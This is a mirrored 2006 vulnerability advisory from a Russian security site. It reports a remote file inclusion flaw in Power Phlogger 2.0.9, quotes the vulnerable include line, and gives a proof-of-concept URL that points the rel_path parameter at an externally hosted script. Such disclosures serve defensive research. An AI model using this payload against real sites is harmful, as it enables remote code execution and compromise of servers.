Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  phpPowerCards 2.10 (txt.inc.
php) Remote Code Execution Vulnerability

  Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability

  Active Bulletin Board v1.1 beta2 (doprofiledit.
asp) Remote User Pass Change

  WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability

From:x_w0x <x_w0x_(at)_hotmail.com>
Date:23 октября 2006 г.
Subject:Power Phlogger 2.0.9 Remote|Local File Include Vulnerability

#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Site:      http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author:    x_w0x
# Contact:   [email protected]
###################################
#Vuln Code
(config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt


#Gr££tz:makoki, azzcoder,xoron,[email protected]
#Speciale gr££tz: str0ke, and elite-team

# milw0rm.com [2006-10-19]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород